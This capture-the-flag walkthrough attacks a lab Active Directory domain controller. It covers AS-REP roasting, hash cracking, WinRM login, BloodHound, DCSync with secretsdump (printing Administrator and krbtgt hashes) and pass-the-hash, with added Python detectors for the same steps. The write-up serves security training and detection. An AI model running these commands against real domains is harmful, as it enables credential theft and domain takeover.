Rustscan
Open 172.16.2.5:53
Open 172.16.2.5:88
Open 172.16.2.5:135
Open 172.16.2.5:139
Open 172.16.2.5:445
Open 172.16.2.5:389
Open 172.16.2.5:464
Open 172.16.2.5:636
Open 172.16.2.5:593
Open 172.16.2.5:49687
Open 172.16.2.5:49675
Open 172.16.2.5:49671
Open 172.16.2.5:49676
Open 172.16.2.5:49665
Open 172.16.2.5:49674
Open 172.16.2.5:49668
Open 172.16.2.5:49666
Open 172.16.2.5:49695

Port 389
rpcclient -U "" -N 172.16.2.5
No results
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydomain
command not found: querydomain
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getdomgroups

It's a domain controller, so we can try to enumerate users with the Impacket script GetNPUsers.
getNPusers
impacket-GetNPUsers -usersfile users.txt -no-pass -request -dc-ip 172.16.2.5 dante.admin/172.16.2.5 -format hashcat
$krb5asrep$23$jbercov@DANTE.ADMIN:6d699d224a86cb89276cf70caf8de3b4$414bbe0598a5bcb246aed4121a5521d73d45d18fd7c180d05677fa0aa9eaac8342f5da491d95e38bbd89c61a057104ac8da7dfb3fa61f7df4452e7e85b0463ce39c090c4ddc8d7a72295e9b43a76930fc70fb5b91388c319f3f1b227c7098c09f9f89da2fc5e0d61d73305797a1b8d97285a6817ae4439b708bee2715fa6ed4e3132c32e81bb3ed458425487af549677f97a1f7c50cf53f409e15d23ffd6bc7fd16b32ff7916816f7cb4b8fdf2a9e5727d8178a99bfdaa48943e2803a0a1a68b5a02157400eb9525f54e03f0a55d65a6a71c71ec1d38645f1bd78088f6e43f40da8871a6f7acd5d7bad2

Cracking the hash
hashcat hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$jbercov@DANTE.ADMIN:6d699d224a86cb89276cf70caf8de3b4$414bbe0598a5bcb246aed4121a5521d73d45d18fd7c180d05677fa0aa9eaac8342f5da491d95e38bbd89c61a057104ac8da7dfb3fa61f7df4452e7e85b0463ce39c090c4ddc8d7a72295e9b43a76930fc70fb5b91388c319f3f1b227c7098c09f9f89da2fc5e0d61d73305797a1b8d97285a6817ae4439b708bee2715fa6ed4e3132c32e81bb3ed458425487af549677f97a1f7c50cf53f409e15d23ffd6bc7fd16b32ff7916816f7cb4b8fdf2a9e5727d8178a99bfdaa48943e2803a0a1a68b5a02157400eb9525f54e03f0a55d65a6a71c71ec1d38645f1bd78088f6e43f40da8871a6f7acd5d7bad2:myspace7

CrackMapExec with the username and password
crackmapexec smb 172.16.2.5 -u 'jbercov' -p 'myspace7' --shares
SMB 172.16.2.5 445 DANTE-DC02 [*] Windows 10.0 Build 17763 x64 (name:DANTE-DC02) (domain:DANTE.ADMIN) (signing:True) (SMBv1:False)
SMB 172.16.2.5 445 DANTE-DC02 [+] DANTE.ADMIN\jbercov:myspace7
SMB 172.16.2.5 445 DANTE-DC02 [+] Enumerated shares
SMB 172.16.2.5 445 DANTE-DC02 Share Permissions Remark
SMB 172.16.2.5 445 DANTE-DC02 ----- ----------- ------
SMB 172.16.2.5 445 DANTE-DC02 ADMIN$ Remote Admin
SMB 172.16.2.5 445 DANTE-DC02 C$ Default share
SMB 172.16.2.5 445 DANTE-DC02 IPC$ READ Remote IPC
SMB 172.16.2.5 445 DANTE-DC02 NETLOGON READ Logon server share
SMB 172.16.2.5 445 DANTE-DC02 SYSVOL READ Logon server share
crackmapexec winrm 172.16.2.5 -u 'jbercov' -p 'myspace7'
SMB 172.16.2.5 5985 DANTE-DC02 [*] Windows 10.0 Build 17763 (name:DANTE-DC02) (domain:DANTE.ADMIN)
HTTP 172.16.2.5 5985 DANTE-DC02 [*] http://172.16.2.5:5985/wsman
WINRM 172.16.2.5 5985 DANTE-DC02 [+] DANTE.ADMIN\jbercov:myspace7 (Pwn3d!)

Evil-WinRM
evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7' /domain:dante.admin

Getting the flag
Location : Directory: C:\Users\jbercov\Desktop
DANTE{Im_too_hot_Im_K3rb3r045TinG!}
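From the defender's side, the GetNPUsers and hashcat steps above leave two traces in Security event 4768 (Kerberos TGT request) on the DC: a burst of unknown-principal failures from the -usersfile sweep, and a TGT issued without pre-authentication using RC4. The following is an added example, not code from the writeup, that flags both over constructed events; the address 10.10.14.7, the account alice and the threshold of 5 are assumptions, and the field names follow the 4768 event XML.

```python
# Added example, not from the writeup: the two traces the GetNPUsers/hashcat
# step leaves in Security event 4768 (Kerberos TGT request) on the DC.
from collections import Counter

RC4_HMAC = "0x17"           # etype 23, the "$23$" in the AS-REP hash format
NO_PREAUTH = "0"            # Pre-Authentication Type 0: no pre-auth performed
PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN: account does not exist
ENUM_THRESHOLD = 5          # unknown-name failures from one source before alerting (assumed)

def ev(user, ip, status, preauth, etype):
    """One constructed 4768 record, keyed by the event's XML field names."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample; 10.10.14.7 is a made-up source address. A -usersfile
# sweep fails with 0x6 for every name that is not a real account, then the one
# account without pre-auth gets an RC4-encrypted reply that is crackable offline.
SAMPLE_4768 = [
    ev("nosuchuser1", "10.10.14.7", "0x6", "-", "0xffffffff"),
    ev("nosuchuser2", "10.10.14.7", "0x6", "-", "0xffffffff"),
    ev("nosuchuser3", "10.10.14.7", "0x6", "-", "0xffffffff"),
    ev("nosuchuser4", "10.10.14.7", "0x6", "-", "0xffffffff"),
    ev("nosuchuser5", "10.10.14.7", "0x6", "-", "0xffffffff"),
    ev("jbercov", "10.10.14.7", "0x0", "0", "0x17"),           # the roastable TGT
    ev("alice", "172.16.2.20", "0x0", "2", "0x12"),            # normal: timestamp pre-auth, AES256
    ev("typo.user", "172.16.2.21", "0x6", "-", "0xffffffff"),  # one mistyped logon name
]

def roastable_tgts(events):
    """Accounts issued a TGT with no pre-auth and RC4: the AS-REP roasting signal."""
    return [e["TargetUserName"] for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == NO_PREAUTH
            and e["TicketEncryptionType"] == RC4_HMAC]

def username_enumeration(events, threshold=ENUM_THRESHOLD):
    """Sources with many unknown-principal failures: Kerberos user enumeration."""
    failures = Counter(e["IpAddress"] for e in events if e["Status"] == PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in failures.items() if n >= threshold}

if __name__ == "__main__":
    print("AS-REP roastable TGT issued to:", roastable_tgts(SAMPLE_4768))
    print("Kerberos user enumeration from:", username_enumeration(SAMPLE_4768))
```

Accounts the first function reports are the ones to clear the "Do not require Kerberos preauthentication" flag on; the second function's output is a source address worth correlating with the 4624/4625 logons that follow.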
Bloodhound python
The user jbercov is a domain user, so let's run BloodHound.
bloodhound-python -u 'jbercov' -p 'myspace7' -dc 'DANTE-DC02.dante.admin' -d dante.admin -c all -ns 172.16.2.5
Results
The user JBERCOV@DANTE.ADMIN has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege on the domain DANTE.ADMIN.
These two privileges allow a principal to perform a DCSync attack.
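These same two extended rights are what the DC records when the replication call arrives, so the DCSync step is visible in Security event 4662 as a Control Access operation on the domain object. The following is an added example, not code from the writeup, that flags replication requests from any principal other than the DC's own account; the 4662 records and the placeholder attribute GUID are constructed, while DANTE-DC02$ and the dante.admin naming context come from the writeup.

```python
# Added example, not from the writeup: the DCSync step shows up in Security
# event 4662 on the DC as a Control Access operation on the domain object
# whose Properties list the DS-Replication-Get-Changes* extended-right GUIDs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # the AccessMask bit for extended (control access) rights

# Principals expected to replicate: the domain controllers' own computer
# accounts. An explicit list beats a "name ends with $" heuristic, since
# every computer account, not just a DC's, carries the $ suffix.
REPLICATION_ALLOWLIST = {"DANTE-DC02$"}

def ev(subject, mask, properties, obj="DC=dante,DC=admin"):
    """One constructed 4662 record, keyed by the event's XML field names."""
    return {"SubjectUserName": subject, "AccessMask": mask,
            "ObjectName": obj, "Properties": properties}

# %%7688 is how the event renders "Control Access" ahead of the right GUIDs.
REPL_ALL = ("%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
            "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}")
SAMPLE_4662 = [   # constructed, not real DC logs
    ev("DANTE-DC02$", "0x100", REPL_ALL),    # DC-to-DC replication: expected
    ev("jbercov", "0x100", REPL_ALL),        # a user account replicating: DCSync
    ev("jbercov", "0x10", "%%7684 {00000000-0000-0000-0000-000000000000}"),  # plain read, placeholder GUID
]

def dcsync_alerts(events, allowlist=REPLICATION_ALLOWLIST):
    """(subject, object, rights) for replication requests from non-allowlisted principals."""
    alerts = []
    for e in events:
        if (int(e["AccessMask"], 16) & CONTROL_ACCESS) == 0:
            continue
        props = e["Properties"].lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights and e["SubjectUserName"] not in allowlist:
            alerts.append((e["SubjectUserName"], e["ObjectName"], rights))
    return alerts

if __name__ == "__main__":
    for subject, obj, rights in dcsync_alerts(SAMPLE_4662):
        print(f"DCSync suspected: {subject} exercised {', '.join(rights)} on {obj}")
```

The same GUIDs are what to search for in the domain object's ACL when auditing who could run this step; any ACE granting them to a user or group outside the DC accounts is the misconfiguration BloodHound reported here.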
Impacket DCsync
impacket-secretsdump 'DANTE.admin/jbercov:myspace7@172.16.2.5'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c827b7074e99eefd49d05872185f7f8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2e5f00bc433acee0ae72f622450bd63c:::
DANTE.ADMIN\jbercov:1106:aad3b435b51404eeaad3b435b51404ee:2747def689b576780fe2339fd596688c:::
DANTE-DC02$:1000:aad3b435b51404eeaad3b435b51404ee:2d71f79cc91e685e607cca600594c414:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0652a9eb0b8463a8ca287fc5d099076fbbd5f1d4bc0b94466ccbcc5c4a186095
Administrator:aes128-cts-hmac-sha1-96:08f140624c46af979044dde5fff44cfd
Administrator:des-cbc-md5:8ac752cea84f4a10
krbtgt:aes256-cts-hmac-sha1-96:a696318416d7e5d58b1b5763f1a9b7f2aa23ca743ac3b16990e5069426d4bc46
krbtgt:aes128-cts-hmac-sha1-96:783ecc93806090e2b21d88160905dc36
krbtgt:des-cbc-md5:dcbff8a80b5b343e
DANTE.ADMIN\jbercov:aes256-cts-hmac-sha1-96:5b4b2e67112ac898f13fc8b686c07a43655c5b88c9ba7e5b48b1383bc5b3a3b6
DANTE.ADMIN\jbercov:aes128-cts-hmac-sha1-96:489ca03ed99b1cb73e7a28c242328d0d
DANTE.ADMIN\jbercov:des-cbc-md5:c7e08938cb7f929d
DANTE-DC02$:aes256-cts-hmac-sha1-96:bdaa01ff2945c6f49f5fe57c949c69fd1feb6790f7bc8a1124dc698e430d7981
DANTE-DC02$:aes128-cts-hmac-sha1-96:fa87584c0de69755a65fbf6008da8298
DANTE-DC02$:des-cbc-md5:83a82f8013c21392
[*] Cleaning up...

Evil-WinRM
evil-winrm -i 172.16.2.5 -u 'Administrator' -H 4c827b7074e99eefd49d05872185f7f8 /domain:dante.admin
*Evil-WinRM* PS C:\Users\Administrator\Documents> type Jenkins.bat
net user Admin_129834765 SamsungOctober102030 /add
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Note.txt
You were supposed to find this subnet via enumerating the browser history files on DC01.
172.16.1.10 can also pivot to this box, it may be a bit more stable than DC01.
Flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
DANTE{DC_or_Marvel?}

Ping Sweep Windows
1..256 | % {"172.16.2.$($_): $(Test-Connection -count 1 -comp 172.16.2.$($_) -quiet)"}